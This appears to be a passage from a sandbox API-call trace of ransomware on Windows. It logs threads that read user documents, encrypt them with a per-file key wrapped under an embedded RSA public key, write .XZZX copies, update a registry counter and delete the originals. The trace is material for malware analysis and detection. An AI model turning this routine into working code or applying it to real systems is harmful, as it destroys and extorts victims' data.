[0042.578] CryptGenKey (in: hProv=0x42d47f0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e58d0) returned 1 [0042.850] CryptExportKey (in: hKey=0x42e58d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0042.850] CryptExportKey (in: hKey=0x42e58d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x42ce41c | out: pbData=0x3f00000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0042.850] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.851] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0042.851] CryptDestroyKey (hKey=0x42e58d0) returned 1 [0042.851] CryptReleaseContext (hProv=0x42d4988, dwFlags=0x0) returned 0 [0042.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\5154BE9C1011AFD27B96A6C6143E941A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\5154be9c1011afd27b96a6c6143e941a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0042.851] WriteFile (in: hFile=0x4e0, lpBuffer=0x42d3050*, nNumberOfBytesToWrite=0x10b9, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42d3050*, lpNumberOfBytesWritten=0x42ce438*=0x10b9, lpOverlapped=0x0) returned 1 [0042.852] SetFilePointer (in: hFile=0x4e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10b9 [0042.852] WriteFile (in: hFile=0x4e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0042.852] SetFilePointer (in: hFile=0x4e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10be [0042.852] WriteFile (in: hFile=0x4e0, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x1e, lpOverlapped=0x0) returned 1 [0042.852] SetFilePointer (in: hFile=0x4e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10dc [0042.852] WriteFile (in: hFile=0x4e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0042.852] SetFilePointer (in: hFile=0x4e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10e1 [0042.852] SetErrorMode (uMode=0x1) returned 0x1 [0042.852] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0042.852] OutputDebugStringW (lpOutputString="end") [0042.853] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0042.853] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0042.853] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x42d4a10) returned 1 [0042.853] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4a10, dwCertEncodingType=0x1, pInfo=0x3e3f700*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f730*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f738*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e58d0) returned 1 [0042.853] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.854] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0042.854] CryptEncrypt (in: hKey=0x42e58d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0042.854] CryptEncrypt (in: hKey=0x42e58d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d4a98*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d4a98*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0042.854] WriteFile (in: hFile=0x4e0, lpBuffer=0x42d4a98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42d4a98*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0042.854] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0042.854] WriteFile (in: hFile=0x4e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0042.854] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0042.854] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0042.854] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x4ec) returned 0x0 [0042.854] RegQueryValueExW (in: hKey=0x4ec, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x31, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0042.854] RegCloseKey (hKey=0x4ec) returned 0x0 [0042.854] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x4ec) returned 0x0 [0042.854] RegSetValueExW (in: hKey=0x4ec, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x32, cbData=0x4 | out: lpData=0x42cdfec*=0x32) returned 0x0 [0042.855] RegCloseKey (hKey=0x4ec) returned 0x0 [0042.855] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.855] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.855] CloseHandle (hObject=0x4e0) returned 1 [0042.856] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0042.856] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0042.856] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\Ld7trnreSqi.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\ld7trnresqi.doc")) returned 1 [0042.857] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\Ld7trnreSqi.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\ld7trnresqi.doc")) returned 0 Thread: id = 144 os_tid = 0x99c [0042.800] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.800] lstrcpyW (in: lpString1=0x417f460, lpString2="nmyti-BLd1o.xlsx" | out: lpString1="nmyti-BLd1o.xlsx") returned="nmyti-BLd1o.xlsx" [0042.800] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.800] SetErrorMode (uMode=0x1) returned 0x1 [0042.800] lstrcpyW (in: lpString1=0x417f860, lpString2="nmyti-BLd1o.xlsx" | out: lpString1="nmyti-BLd1o.xlsx") returned="nmyti-BLd1o.xlsx" [0042.800] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xcccbc0d6, Data2=0x37a9, Data3=0x439e, Data4=([0]=0x8e, [1]=0xf, [2]=0x7d, [3]=0xc0, [4]=0x6b, [5]=0x7c, [6]=0x74, [7]=0x9c))) returned 0x0 [0042.800] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\nmyti-BLd1o.xlsx") returned 97 [0042.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0042.801] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned 118 [0042.801] StrStrW (lpFirst="nmyti-BLd1o.xlsx", lpSrch="XZZX") returned 0x0 [0042.801] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\nmyti-BLd1o.xlsx", dwFileAttributes=0x20) returned 1 [0042.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\nmyti-BLd1o.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\nmyti-bld1o.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0042.801] ReadFile (in: hFile=0x4e0, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x1502d, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x417e418*=0x1502d, lpOverlapped=0x0) returned 1 [0042.802] CloseHandle (hObject=0x4e0) returned 1 [0042.802] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0042.802] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0042.802] SetErrorMode (uMode=0x1) returned 0x1 [0042.802] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0042.802] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d4988) returned 1 [0042.807] CryptGenKey (in: hProv=0x42d4988, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5950) returned 1 [0043.117] CryptExportKey (in: hKey=0x42e5950, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0043.117] CryptExportKey (in: hKey=0x42e5950, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0043.117] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.117] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0043.117] CryptDestroyKey (hKey=0x42e5950) returned 1 [0043.117] CryptReleaseContext (hProv=0x42d4b20, dwFlags=0x0) returned 0 [0043.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\F8F047460EB3954ECCCBC0D612CB7996.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\f8f047460eb3954ecccbc0d612cb7996.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0043.118] WriteFile (in: hFile=0x4e4, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x1502d, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x417e438*=0x1502d, lpOverlapped=0x0) returned 1 [0043.120] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1502d [0043.120] WriteFile (in: hFile=0x4e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.120] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15032 [0043.120] WriteFile (in: hFile=0x4e4, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x20, lpOverlapped=0x0) returned 1 [0043.120] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15052 [0043.120] WriteFile (in: hFile=0x4e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.120] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15057 [0043.120] SetErrorMode (uMode=0x1) returned 0x1 [0043.120] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0043.120] OutputDebugStringW (lpOutputString="end") [0043.120] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0043.120] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0043.121] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d4ba8) returned 1 [0043.121] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4ba8, dwCertEncodingType=0x1, pInfo=0x3e3f7d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f800*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f808*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5950) returned 1 [0043.121] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.122] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0043.122] CryptEncrypt (in: hKey=0x42e5950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0043.122] CryptEncrypt (in: hKey=0x42e5950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d4c30*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d4c30*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0043.122] WriteFile (in: hFile=0x4e4, lpBuffer=0x42d4c30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d4c30*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0043.122] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0043.122] WriteFile (in: hFile=0x4e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.122] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0043.123] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0043.123] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4f0) returned 0x0 [0043.123] RegQueryValueExW (in: hKey=0x4f0, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x32, lpcbData=0x417dfdc*=0x4) returned 0x0 [0043.123] RegCloseKey (hKey=0x4f0) returned 0x0 [0043.123] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4f0) returned 0x0 [0043.123] RegSetValueExW (in: hKey=0x4f0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x33, cbData=0x4 | out: lpData=0x417dfec*=0x33) returned 0x0 [0043.123] RegCloseKey (hKey=0x4f0) returned 0x0 [0043.123] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.123] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.124] CloseHandle (hObject=0x4e4) returned 1 [0043.125] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0043.126] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0043.126] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\nmyti-BLd1o.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\nmyti-bld1o.xlsx")) returned 1 [0043.127] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\nmyti-BLd1o.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\nmyti-bld1o.xlsx")) returned 0 Thread: id = 145 os_tid = 0x934 [0042.990] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.990] lstrcpyW (in: lpString1=0x42cf460, lpString2="qOmkS_BDD92-oYj.xls" | out: lpString1="qOmkS_BDD92-oYj.xls") returned="qOmkS_BDD92-oYj.xls" [0042.990] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.990] SetErrorMode (uMode=0x1) returned 0x1 [0042.990] lstrcpyW (in: lpString1=0x42cf860, lpString2="qOmkS_BDD92-oYj.xls" | out: lpString1="qOmkS_BDD92-oYj.xls") returned="qOmkS_BDD92-oYj.xls" [0042.990] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x6c2b225e, Data2=0xb7b4, Data3=0x43db, Data4=([0]=0xa4, [1]=0x78, [2]=0x70, [3]=0xc8, [4]=0xc0, [5]=0x5, [6]=0x75, [7]=0x42))) returned 0x0 [0042.990] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\qOmkS_BDD92-oYj.xls") returned 100 [0042.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0042.990] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS 